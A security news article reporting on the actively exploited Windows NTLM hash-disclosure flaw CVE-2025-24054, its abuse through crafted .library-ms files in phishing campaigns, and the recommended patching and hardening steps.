CVE-2025-24054 Under Active Exploitation — Critical NTLM Credential Theft Vulnerability in Windows

A newly exploited Windows security flaw, identified as CVE-2025-24054, is now under active attack—allowing threat actors to steal NTLM credentials through simple file downloads. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has officially added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog following verified reports of in-the-wild exploitation.

🔍 What is CVE-2025-24054?

• CVE ID: CVE-2025-24054

• CVSS Score: 6.5 (Medium Severity)

• Impact: NTLM hash disclosure via spoofing

• Affected Systems: Microsoft Windows

• Patched: March 2025 Patch Tuesday update

• Discovered by: Rintaro Koike (NTT Security Holdings), 0x6rss, and j00sean

🚨 Exploited via Malicious .library-ms Files

The vulnerability stems from a spoofing issue within the deprecated NTLM (New Technology LAN Manager) authentication protocol. Microsoft warns that minimal interaction with a specially crafted .library-ms file—such as clicking, right-clicking, or merely viewing the file—can trigger the flaw.

Attackers can exploit this to leak NTLMv2 hashes, which can then be weaponized in pass-the-hash or relay attacks to infiltrate systems and move laterally within networks.

 

“Microsoft Windows NTLM contains an external control of file name or path vulnerability that allows an unauthorized attacker to perform spoofing over a network,” said CISA.

⚠️ Widespread Attacks and Active Campaigns

According to Check Point Research, the vulnerability has been actively exploited since March 19, 2025, despite Microsoft's initial classification of "Exploitation Less Likely."

Notable Campaigns Include:

• March 20–21, 2025:

  • Attackers launched a malspam campaign targeting government and private sectors in Poland and Romania.

  • The emails contained Dropbox links distributing ZIP files embedded with CVE-2025-24054, enabling NTLMv2 hash theft.

• March 25, 2025:

  • A separate phishing wave delivered an uncompressed malicious file named Info.doc.library-ms.

  • Since then, at least 10 campaigns have been documented using this method.

Once the malicious archive is extracted, Windows Explorer automatically initiates an SMB authentication request, leaking the victim’s NTLM credentials—without any direct user interaction.

🛡️ Urgent Security Recommendations

Check Point emphasizes that these ongoing attacks highlight the critical need for immediate patching and system hardening:

 

“The minimal user interaction required and the ease with which NTLM hashes are exposed make this a high-priority risk for lateral movement and privilege escalation.”

✅ Mitigation Steps

• Install Microsoft’s March 2025 security updates immediately.

• Disable NTLM authentication wherever possible and switch to Kerberos.

• Educate end users about suspicious file downloads and phishing emails.

• Monitor SMB traffic and external authentication requests.

⏳ Deadline for Government Agencies

All Federal Civilian Executive Branch (FCEB) agencies must apply the fix no later than May 8, 2025, as mandated by CISA.

🏁 Final Thoughts

CVE-2025-24054 poses a significant security threat due to its low interaction requirement and the potential for credential compromise. Organizations must act swiftly to patch the flaw, review their authentication configurations, and stay vigilant against malicious .library-ms file campaigns.